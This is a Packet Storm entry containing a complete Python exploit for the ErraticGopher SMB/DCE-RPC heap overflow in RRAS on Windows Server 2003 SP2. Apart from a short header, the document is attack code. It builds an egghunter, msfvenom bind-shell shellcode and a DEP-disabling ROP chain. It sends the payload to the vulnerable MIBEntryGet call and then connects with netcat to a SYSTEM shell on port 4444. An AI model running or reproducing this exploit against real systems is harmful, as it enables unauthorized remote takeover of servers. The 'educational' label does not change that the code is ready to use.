Microsoft Windows 2003 SP2 ERRATICGOPHER SMB Remote Code Execution

2017-04-26T00:00:00
ID PACKETSTORM:142313
Type packetstorm
Reporter vportal
Modified 2017-04-26T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
##################################################################################  
# By Victor Portal (vportal) for educational porpouse only   
##################################################################################  
# This exploit is the python version of the ErraticGopher exploit probably #  
# with some modifications. ErraticGopher exploits a memory corruption #  
# (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet. #  
# Because the Magic bytes, the application redirects the execution to the #  
# iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy #  
# all te injected stub from the heap to the stack, overwritten a return #  
# address as well as the SEH handler stored in the Stack, being possible #   
# to control the execution flow to disable DEP and jump to the shellcode #  
# as SYSTEM user. #  
##################################################################################  
#The exploit only works if target has the RRAS service enabled  
#Tested on Windows Server 2003 SP2  
  
import struct  
import sys  
import time  
import os  
  
from threading import Thread   
  
from impacket import smb  
from impacket import uuid  
from impacket import dcerpc  
from impacket.dcerpc.v5 import transport  
  
target = sys.argv[1]  
  
print '[-]Initiating connection'  
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)  
trans.connect()  
  
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target  
dce = trans.DCERPC_class(trans)  
#RRAS DCE-RPC CALL  
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))  
  
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"  
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  
  
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python  
buf = ""  
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"  
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"  
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"  
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"  
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"  
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"  
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"  
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"  
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"  
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"  
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"  
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"  
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"  
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"  
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"  
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"  
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"  
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"  
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"  
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"  
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"  
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"  
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"  
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"  
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"  
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"  
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"  
buf += "\xc4\x25\x3d\xe9"  
  
#NX disable routine for Windows Server 2003 SP2  
rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll  
rop += "\x45"*16  
rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll  
rop += "\x5d\x7a\x81\x7c" #ret 20  
rop += "\x71\x42\x38\x77" #jmp esp  
rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll  
rop += "\x90"*2 + egghunter + "\x90"*42  
rop += "\x17\xf5\x83\x7c" #Disable NX routine  
rop += "\x90"*4  
  
stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes  
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))  
stub += "\x12" #Magic byte  
stub += "\x46"*522  
stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes  
  
  
dce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function)  
print "[-]Exploit sent to target successfully..."  
  
print "Waiting for shell..."  
time.sleep(5)  
os.system("nc " + target + " 4444")  
  
`